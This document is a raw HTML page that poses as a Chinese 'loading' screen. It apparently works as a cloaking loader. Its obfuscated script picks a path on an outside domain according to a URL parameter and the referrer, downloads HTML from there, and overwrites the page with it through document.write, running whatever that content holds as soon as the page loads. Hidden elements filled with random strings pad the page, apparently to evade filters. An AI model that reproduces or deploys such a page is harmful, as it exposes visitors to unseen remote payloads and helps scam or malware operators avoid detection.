<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cZdRuBYoj3Z {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cZdRuBYoj3Z .ETLQk7sKo6N {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cZdRuBYoj3Z .content {
            line-height: 50px;
            text-align: center
        }

        .cZdRuBYoj3Z .img {
            width: 100%
        }

        .cZdRuBYoj3Z .IeEQ0L {
            text-align: center
        }

        .cZdRuBYoj3Z .IeEQ0L span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cZdRuBYoj3Z .IeEQ0L span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cZdRuBYoj3Z .IeEQ0L span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cZdRuBYoj3Z .IeEQ0L span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cZdRuBYoj3Z .IeEQ0L span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cZdRuBYoj3Z .IeEQ0L span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cZdRuBYoj3Z .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function orepM34GqP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vSl15DF = orepM34GqP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vSl15DF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vSl15DF +".html?a=share";
		}
		
        ptZnFs=url+"#"+new Date().getTime();
        ptZnFs && function() {
            $.get(ptZnFs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >ugsMfpU9aqypddo3CB4j0yj3Hx9xBRwBKYBE9BBAFKPw6UgSnBbj7P7UwuPmwvC8FNDwcSm3Gx9M6moCh6PxrjP5</b>
<p  style='display:none'>ew9SbTBAsxr9LKSpgeD7ozuc06zvLmSJ1DOqqofvJkQHdgh1I9Sdgd9Rf3wilVPPT</p>
<p  style='display:none'>ew9SbTBAsxr9LKSpgeD7ozuc06zvLmSJ1DOqqofvJkQHdgh1I9Sdgd9Rf3wilVPPT</p>
<img  src='' style='display:none'>
<ul style='display:none' >ssmpVFbUuyo0TDmd6U9hLJMf9z605WyTnXC4TrD7mYHvnQqHVP1infWshj5PBDJ4IyxwLenGsAnDlVGUKCxVFvS1cAinFFr</ul><div class="cZdRuBYoj3Z">
    <div class="ETLQk7sKo6N">
        <div class="IeEQ0L">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >xFwGKGfVb3s4CtXhxf07Im6Pb93JoW0VLJHzQxG0DkHy1lSWNglE622P2RupxwCm4r4hp7J4Xn0gTq</b>
<li style='display:none' >IroHbkgYZHqweqZ4J2mh48fDAsmOjDU5jriGZCU2xBSS2SlH6B4HoFqXUp55IcebmCqzP4n</li>
<span style='display:none'>w1z21bCEDaS0JIpEkHZEtHr2n</span>
<a  href='#' style='display:none'>JLT5SoKVehIfuC6qDvKWXJJNi0BlzhOd3rq19GWgduuus7s7A9bNH</a>
<a  href='#' style='display:none'>JLT5SoKVehIfuC6qDvKWXJJNi0BlzhOd3rq19GWgduuus7s7A9bNH</a>
<h1 style='display:none' >TTyZ7s2xK49I0G7a1OOng0y0p5NNQ5wCkEZ8IX9kKRUx0dP55CWGCAxoF4fNkAE5IC9i6d</h1></body>
</html>